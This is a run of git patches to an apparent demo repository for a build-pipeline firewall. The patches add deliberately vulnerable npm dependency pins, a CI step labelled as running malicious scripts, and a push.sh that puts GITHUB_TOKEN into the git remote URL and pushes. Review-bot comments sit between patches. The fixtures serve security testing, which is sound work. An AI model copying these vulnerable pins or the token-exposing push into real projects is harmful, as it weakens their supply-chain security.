+ uses: fjogeleit/http-request-action@v1.15.1
+ with:
+ url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}'
+ method: 'GET'
+ - name: Decoding VB Token
+ id: parseToken
+ run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT"
+ - name: ECR Details
+ id: ecr_details
+ run: |
+ echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT"
+ echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT"
+ echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT"
+ echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT"
+
+ start_proxy_and_build:
+ runs-on: ubuntu-latest
+ needs: [create_scan_in_IR_Portal, ecr_details]
+ services:
+ pse:
+ image: 
282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test + credentials: + username: ${{needs.ecr_details.outputs.ecr_username}} + password: ${{needs.ecr_details.outputs.ecr_token}} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.veribom.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + container: + image: node:18-buster + options: --cap-add=NET_ADMIN --privileged + strategy: + matrix: + node-version: [18.x] + steps: + - name: Install curl + run: | + apt-get update + apt-get install -y curl + + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - name: Execute wrapper script + run: bash run_wrapper.sh + + - name: install dependencies + run: npm install --legacy-peer-deps From d62ffdc19955a615485ee07ff48479fbe18ea48e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 10:05:09 +0545 Subject: [PATCH 60/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 6e3e34a..baa773b 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -1,4 +1,4 @@ -name: Build JS Package For Secrets +name: Build JavaScript package (policy applied) on: workflow_dispatch: push: 
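Review bot: In `start_proxy_and_build`, `options: --cap-add=NET_ADMIN --privileged` runs the job container fully privileged, which makes the explicit `NET_ADMIN` capability redundant and lets `bash run_wrapper.sh` and any lifecycle scripts run by `npm install --legacy-peer-deps` execute with every capability and device access. If the proxy setup only needs to adjust network rules (an assumption; what the PSE action requires is not visible here), `options: --cap-add=NET_ADMIN` alone is the narrower setting. Separately, the `Fetching VB Token` step puts the API key in the query string (`registry?api_key=${{secrets.VB_API_KEY}}`), where it can end up in server and proxy access logs; a request header or body field would avoid that if the API accepts one. The `ecr_details` job also expands `${{ fromJson(...) }}` directly into `run:` shell text, so response content becomes part of the script; passing those values through `env:` and referencing shell variables keeps them out of the command line.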
@@ -23,7 +23,7 @@ jobs: with: url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' + data: '{"api_key": "${{secrets.VB_API_KEY_P}}"}' - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" @@ -39,7 +39,7 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_P}}' method: 'GET' - name: Decoding VB Token id: parseToken @@ -64,7 +64,7 @@ jobs: env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_P}} INVISIRISK_PORTAL: https://app.veribom.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: From d75ec6c63e0b162b9c14594631653f9dd9ba761e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 1 Apr 2025 10:05:59 +0545 Subject: [PATCH 61/89] Update mainpolicynotapplied.yml --- .github/workflows/mainpolicynotapplied.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/mainpolicynotapplied.yml b/.github/workflows/mainpolicynotapplied.yml index 6e3e34a..1887321 100644 --- a/.github/workflows/mainpolicynotapplied.yml +++ b/.github/workflows/mainpolicynotapplied.yml @@ -1,4 +1,4 @@ -name: Build JS Package For Secrets +name: Build JavaScript Package (policy not applied) on: workflow_dispatch: push: From f3a0d2bc84bd77836aa3ba7e5e9701c7ed0bf659 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 21 Apr 2025 15:34:13 +0545 Subject: [PATCH 62/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 115 ++++++------------------ 1 file changed, 27 insertions(+), 88 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index baa773b..574f001 100644 
--- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml 
@@ -1,100 +1,39 @@ -name: Build JavaScript package (policy applied) +name: JavaScript Project + on: - workflow_dispatch: - push: - branches: [ STAGE ] + workflow_dispatch: permissions: checks: write contents: write packages: read -env: - API_URL: https://app.veribom.com jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY_P}}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: + python-application-build: runs-on: ubuntu-latest - outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} + name: Run build steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 + - name: Setup PSE + uses: invisirisk/pse-action@dev-test with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_P}}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + api_url: 
"https://app.stage.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} + job_status: ${{job.status}} - start_proxy_and_build: - runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] - services: - pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test - credentials: - username: ${{needs.ecr_details.outputs.ecr_username}} - password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_P}} - INVISIRISK_PORTAL: https://app.veribom.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - container: - image: node:18-buster - options: --cap-add=NET_ADMIN --privileged - strategy: - matrix: - node-version: [18.x] - steps: - - name: Install curl - run: | - apt-get update - apt-get install -y curl - - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - - name: Execute wrapper script - run: bash run_wrapper.sh - - - name: install dependencies - run: npm install --legacy-peer-deps + - uses: actions/checkout@v4 + + - name: Use Python + uses: actions/setup-python@v4 + with: + python-version: "3.10" + + - name: Install dependencies + run: pip install -r requirements.txt + + - name: 😈 Execute malicious script + run: bash run_malicious_scripts.sh + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@dev-test + with: + cleanup: "true" From 991daec94988e647401bbba250891dcc091f7849 Mon Sep 17 00:00:00 2001 
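Review bot: Both `uses: invisirisk/pse-action@dev-test` steps track a mutable branch, and the setup step passes it `app_token: ${{ secrets.IR_API_KEY }}`, so whatever commit that branch points to at run time receives the API key. Pin the action to a release tag or, better, a full commit SHA, e.g. `uses: invisirisk/pse-action@<full-commit-sha>`, and use the same ref for the setup and cleanup steps. The workflow also keeps `contents: write` at the top level; unless `run_malicious_scripts.sh` is meant to push (the script is not part of this commit), `contents: read` is enough for checkout and build. A comment above the `😈 Execute malicious script` step stating that it is a deliberate test fixture for the build firewall would keep the step from being mistaken for a compromise during review.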
From: ir-paras-oli Date: Mon, 21 Apr 2025 15:37:20 +0545 Subject: [PATCH 63/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 574f001..8cddb78 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -22,13 +22,13 @@ jobs: - uses: actions/checkout@v4 - - name: Use Python - uses: actions/setup-python@v4 + - name: Use npm + uses: actions/setup-node@v3 with: - python-version: "3.10" + node-version: '18' - name: Install dependencies - run: pip install -r requirements.txt + run: npm install --legacy-peer-deps - name: 😈 Execute malicious script run: bash run_malicious_scripts.sh @@ -37,3 +37,6 @@ jobs: uses: invisirisk/pse-action@dev-test with: cleanup: "true" + + + From fe742dc467172aa0647639aa04d092dc6b4caa92 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 21 Apr 2025 15:39:49 +0545 Subject: [PATCH 64/89] Update mainpolicyapplied.yml From 43ef638ed32473123816f69c32ecaf12f872cfb5 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 21 Apr 2025 15:42:12 +0545 Subject: [PATCH 65/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 8cddb78..cded09f 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -17,7 +17,7 @@ jobs: uses: invisirisk/pse-action@dev-test with: api_url: "https://app.stage.invisirisk.com" - app_token: ${{ secrets.IR_API_KEY }} + app_token: ${{ secrets.VB_API_KEY }} job_status: ${{job.status}} - uses: actions/checkout@v4 From a108c48f91faf5f41e151f477748aaec9103f514 Mon Sep 17 00:00:00 2001 
From: ir-paras-oli Date: Tue, 22 Apr 2025 10:58:32 +0545 Subject: [PATCH 66/89] Update package.json --- package.json | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/package.json b/package.json index 2b3c326..cd86e54 100644 --- a/package.json +++ b/package.json @@ -14,14 +14,14 @@ "body-parser": "1.19.0", "cors": "2.8.5", "dotenv": "8.2.0", - "jsonwebtoken": "8.5.1", + "jsonwebtoken": "8.3.0", "helmet": "3.23.3", "morgan": "1.10.0", "bcryptjs": "2.4.3", "moment": "2.24.0", "request": "2.88.2", "bluebird": "3.7.2", - "debug": "4.1.1", + "debug": "2.6.9", "async": "3.2.0", "winston": "3.2.1", "multer": "1.4.2", @@ -37,12 +37,11 @@ "crypto-js": "4.0.0", "node-fetch": "2.6.1", "sharp": "0.25.4", - "jsonwebtoken": "8.3.0", "commander": "5.0.0", "chalk": "4.0.0", "ini": "1.3.5", "handlebars": "4.7.6", - "marked": "0.7.0", + "marked": "0.3.6", "merge-deep": "3.0.2", "minimist": "1.2.5", "q": "1.5.1", @@ -50,14 +49,20 @@ "yargs-parser": "20.2.2", "jquery": "3.5.1", "xmlhttprequest": "1.8.0", - "debug": "2.6.9", - "merge": "1.2.1", "lodash.merge": "4.6.2", "lodash.defaultsdeep": "4.6.1", - "marked": "0.3.6", "react": "16.13.1", "react-dom": "16.13.1", "axios": "0.19.2", - "next": "13.5.5" + "next": "13.5.5", + + // NEWLY ADDED VULNERABLE PACKAGES + "shelljs": "0.8.4", + "node-forge": "0.10.0", + "xml-js": "1.6.11", + "hoek": "5.0.3", + "growl": "1.10.5", + "jquery-file-upload": "9.12.5", + "angular": "1.7.5" } } From 931e489b9642ecadac95c6213e05b28c8ed8af79 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 22 Apr 2025 10:59:32 +0545 Subject: [PATCH 67/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index cded09f..c4385e1 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml 
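Review bot: The `// NEWLY ADDED VULNERABLE PACKAGES` line added inside `dependencies` in the third hunk makes package.json invalid, because JSON has no comment syntax; `npm install` is expected to fail on the parse error before any dependency is fetched, so the scan this commit is meant to feed never sees the new packages. Drop the line (and the blank line before it) and record the intent in the commit message or README instead. The same problem returns in PATCH 70/89, where `#"growl": "1.10.5",` and `#"angular": "1.7.5"` are commented out with `#` and leave a trailing comma after `"hoek": "5.0.3",`. Since the version downgrades of `jsonwebtoken`, `debug` and `marked` look deliberate for a test fixture, a short note in the README saying so would stop automated dependency updates or reviewers from reverting them.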
@@ -30,8 +30,8 @@ jobs: - name: Install dependencies run: npm install --legacy-peer-deps - - name: 😈 Execute malicious script - run: bash run_malicious_scripts.sh + #- name: 😈 Execute malicious script + #run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() uses: invisirisk/pse-action@dev-test From d4f521c40614913247ef14f92ae5bb28a3edddb7 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 22 Apr 2025 11:02:46 +0545 Subject: [PATCH 68/89] Update package.json --- package.json | 2 -- 1 file changed, 2 deletions(-) diff --git a/package.json b/package.json index cd86e54..c5479d5 100644 --- a/package.json +++ b/package.json @@ -55,8 +55,6 @@ "react-dom": "16.13.1", "axios": "0.19.2", "next": "13.5.5", - - // NEWLY ADDED VULNERABLE PACKAGES "shelljs": "0.8.4", "node-forge": "0.10.0", "xml-js": "1.6.11", From 184947fbfebfa455d3e56b56db083a11f6c2144e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 22 Apr 2025 11:05:26 +0545 Subject: [PATCH 69/89] Update package.json --- package.json | 1 - 1 file changed, 1 deletion(-) diff --git a/package.json b/package.json index c5479d5..4b5e7ab 100644 --- a/package.json +++ b/package.json @@ -60,7 +60,6 @@ "xml-js": "1.6.11", "hoek": "5.0.3", "growl": "1.10.5", - "jquery-file-upload": "9.12.5", "angular": "1.7.5" } } From bc9e0cf8e7ea97588ccc95dc8dab7a93d501a440 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 23 Apr 2025 15:17:44 +0545 Subject: [PATCH 70/89] Update package.json --- package.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index 4b5e7ab..999432c 100644 --- a/package.json +++ b/package.json @@ -59,7 +59,7 @@ "node-forge": "0.10.0", "xml-js": "1.6.11", "hoek": "5.0.3", - "growl": "1.10.5", - "angular": "1.7.5" + #"growl": "1.10.5", + #"angular": "1.7.5" } } From 76a5ddaa30c7c5f8b1114282e1f7a4c924f0e9b5 Mon Sep 17 00:00:00 2001 
From: ir-paras-oli Date: Wed, 23 Apr 2025 15:18:23 +0545 Subject: [PATCH 71/89] Update package.json --- package.json | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/package.json b/package.json index 999432c..56f2dd3 100644 --- a/package.json +++ b/package.json @@ -58,8 +58,6 @@ "shelljs": "0.8.4", "node-forge": "0.10.0", "xml-js": "1.6.11", - "hoek": "5.0.3", - #"growl": "1.10.5", - #"angular": "1.7.5" + "hoek": "5.0.3" } } From ef76437158230b851c552cb63f96aa4d8b9069fa Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 28 Apr 2025 11:49:42 +0545 Subject: [PATCH 72/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index c4385e1..435ca14 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -16,7 +16,7 @@ jobs: - name: Setup PSE uses: invisirisk/pse-action@dev-test with: - api_url: "https://app.stage.invisirisk.com" + api_url: "https://app.dev.veribom.com" app_token: ${{ secrets.VB_API_KEY }} job_status: ${{job.status}} From bd3bb80b7162e671485d303b0ea5674eacc46569 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 28 Apr 2025 11:51:58 +0545 Subject: [PATCH 73/89] Update mainpolicyapplied.yml --- .github/workflows/mainpolicyapplied.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/mainpolicyapplied.yml index 435ca14..c7e8eb2 100644 --- a/.github/workflows/mainpolicyapplied.yml +++ b/.github/workflows/mainpolicyapplied.yml @@ -30,8 +30,8 @@ jobs: - name: Install dependencies run: npm install --legacy-peer-deps - #- name: 😈 Execute malicious script - #run: bash run_malicious_scripts.sh + - name: 😈 Execute malicious script + run: bash run_malicious_scripts.sh - name: Cleanup PSE if: always() uses: invisirisk/pse-action@dev-test 
From 4ef506a77574a5c091456c91e59d62f62bd72197 Mon Sep 17 00:00:00 2001
From: ir-paras-oli
Date: Fri, 2 May 2025 11:40:48 +0545
Subject: [PATCH 74/89] chnage in Readme
---
Malicious_scripts/push.sh | 17 +++++++++++++++++
Malicious_scripts/run_wrapper.sh | 8 ++++++++
Malicious_scripts/statuscode.sh | 11 +++++++++++
3 files changed, 36 insertions(+)
create mode 100644 Malicious_scripts/push.sh
create mode 100644 Malicious_scripts/run_wrapper.sh
create mode 100644 Malicious_scripts/statuscode.sh
diff --git a/Malicious_scripts/push.sh b/Malicious_scripts/push.sh
new file mode 100644
index 0000000..8bd4525
--- /dev/null
+++ b/Malicious_scripts/push.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+
+echo "Marking repository as safe..."
+git config --global --add safe.directory "$GITHUB_WORKSPACE"
+
+echo "Setting up Git user..."
+git config user.name "ir-paras-oli"
+git config user.email "paras.oli@invisirisk.com"
+
+echo "Making changes (creating a file)..."
+echo "Some new content" > new6-file.txt
+git add new6-file.txt
+git commit -m "Add a new file"
+
+echo "Pushing changes to the STAGE branch..."
+git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git
+git push origin STAGE
diff --git a/Malicious_scripts/run_wrapper.sh b/Malicious_scripts/run_wrapper.sh
new file mode 100644
index 0000000..b6e5e2e
--- /dev/null
+++ b/Malicious_scripts/run_wrapper.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+
+echo "Starting leak_token.sh execution..."
+bash ./secret_leak.sh # Call the actual script
+bash ./statuscode.sh # Call the actual script
+bash ./push.sh # Call the actual script
+bash ./mimetype.sh # Call the actual script
+echo "Execution completed."
diff --git a/Malicious_scripts/statuscode.sh b/Malicious_scripts/statuscode.sh
new file mode 100644
index 0000000..bec9161
--- /dev/null
+++ b/Malicious_scripts/statuscode.sh 
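Review bot: The `git remote set-url` line in push.sh uses `${{ secrets.GITHUB_TOKEN }}` and `${{ github.repository }}`, but that expression syntax is only expanded inside workflow YAML; in a standalone script bash sees the literal text and fails with a bad-substitution error, so the remote URL is never set and the fixture does not exercise the push path it is meant to test. Have the calling workflow step pass the token through `env:` and read shell variables in the script, `git remote set-url origin "https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git"`. Writing a token into the remote URL also leaves it in `.git/config` for every later step of the job, which is worth stating in a comment if that exposure is part of what the demo shows. In run_wrapper.sh the `./secret_leak.sh`-style paths only resolve when the working directory is `Malicious_scripts/`, and the first `echo` still refers to `leak_token.sh`.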
@@ -0,0 +1,11 @@
+#!/bin/bash
+
+echo "Checking status code from GitHub API..."
+
+# This request should trigger a 400 Bad Request because 'q' is empty
+curl -k -i -X GET "https://api.github.com/search/repositories?q="
+
+# This request should trigger a 401 Unauthorized if authentication is required but not provided
+# curl -k -i -X GET "https://api.github.com/user"
+
+echo "Status check completed."
From 406254c3c00328b682bbb29240fca2544373d497 Mon Sep 17 00:00:00 2001
From: ir-paras-oli
Date: Fri, 2 May 2025 11:58:32 +0545
Subject: [PATCH 75/89] change
---
secret_leak.sh => .github/secret_leak.sh | 0
.../{mainpolicyapplied.yml => build.yml} | 9 +-
.github/workflows/mainpolicynotapplied.yml | 100 ------------------
README.md | 57 +++++++++-
.../mimetype.sh | 0
push.sh | 17 ---
run_wrapper.sh | 8 --
statuscode.sh | 11 --
8 files changed, 58 insertions(+), 144 deletions(-)
rename secret_leak.sh => .github/secret_leak.sh (100%)
rename .github/workflows/{mainpolicyapplied.yml => build.yml} (89%)
delete mode 100644 .github/workflows/mainpolicynotapplied.yml
rename mimetype.sh => mern-social-second-edition/mimetype.sh (100%)
delete mode 100644 push.sh
delete mode 100644 run_wrapper.sh
delete mode 100644 statuscode.sh
diff --git a/secret_leak.sh b/.github/secret_leak.sh
similarity index 100%
rename from secret_leak.sh
rename to .github/secret_leak.sh
diff --git a/.github/workflows/mainpolicyapplied.yml b/.github/workflows/build.yml
similarity index 89%
rename from .github/workflows/mainpolicyapplied.yml
rename to .github/workflows/build.yml
index c7e8eb2..e6b1523 100644
--- a/.github/workflows/mainpolicyapplied.yml
+++ b/.github/workflows/build.yml 
@@ -17,15 +17,15 @@ jobs: uses: invisirisk/pse-action@dev-test with: api_url: "https://app.dev.veribom.com" - app_token: ${{ secrets.VB_API_KEY }} + app_token: ${{ secrets.IR_API_KEY }} job_status: ${{job.status}} - + - uses: actions/checkout@v4 - name: Use npm uses: actions/setup-node@v3 with: - node-version: '18' + node-version: "18" - name: Install dependencies run: npm install --legacy-peer-deps @@ -37,6 +37,3 @@ jobs: uses: invisirisk/pse-action@dev-test with: cleanup: "true" - - - diff --git a/.github/workflows/mainpolicynotapplied.yml b/.github/workflows/mainpolicynotapplied.yml deleted file mode 100644 index 1887321..0000000 --- a/.github/workflows/mainpolicynotapplied.yml +++ /dev/null 
@@ -1,100 +0,0 @@ -name: Build JavaScript Package (policy not applied) -on: - workflow_dispatch: - push: - branches: [ STAGE ] - -permissions: - checks: write - contents: write - packages: read -env: - API_URL: https://app.veribom.com - -jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: - runs-on: ubuntu-latest - outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} - steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - - start_proxy_and_build: - runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] - services: - pse: - image: 
282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test - credentials: - username: ${{needs.ecr_details.outputs.ecr_username}} - password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.veribom.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - container: - image: node:18-buster - options: --cap-add=NET_ADMIN --privileged - strategy: - matrix: - node-version: [18.x] - steps: - - name: Install curl - run: | - apt-get update - apt-get install -y curl - - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - - name: Execute wrapper script - run: bash run_wrapper.sh - - - name: install dependencies - run: npm install --legacy-peer-deps diff --git a/README.md b/README.md index ed8b0f0..1688be2 100644 --- a/README.md +++ b/README.md 
@@ -1,2 +1,55 @@ -readme -readme +# InvisiRisk Build Application Firewall Demo + +This repository contains a Python application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a Python environment. + +## GitHub Workflow Setup + +To integrate InvisiRisk into your GitHub workflow, add the following steps to each job in your workflow file: + +### 1. Add the Setup PSE step at the beginning of each job: + +```yaml +- name: Setup PSE + uses: invisirisk/pse-action@v1.0.20 + with: + api_url: "https://app.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} +``` + +### 2. Add the Cleanup PSE step at the end of each job: + +```yaml +- name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@v1.0.20 + with: + cleanup: "true" +``` + +### 3. Set up the required secret: + +You need to set the IR_API_KEY secret in your GitHub repository settings. This API key can be obtained from the InvisiRisk portal. + +### Example workflow: + +```yaml +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Setup PSE + uses: invisirisk/pse-action@v1.0.20 + with: + api_url: "https://app.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} + + # Your other build steps here + + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@v1.0.20 + with: + cleanup: "true" +``` diff --git a/mimetype.sh b/mern-social-second-edition/mimetype.sh similarity index 100% rename from mimetype.sh rename to mern-social-second-edition/mimetype.sh diff --git a/push.sh b/push.sh deleted file mode 100644 index 8bd4525..0000000 --- a/push.sh +++ /dev/null 
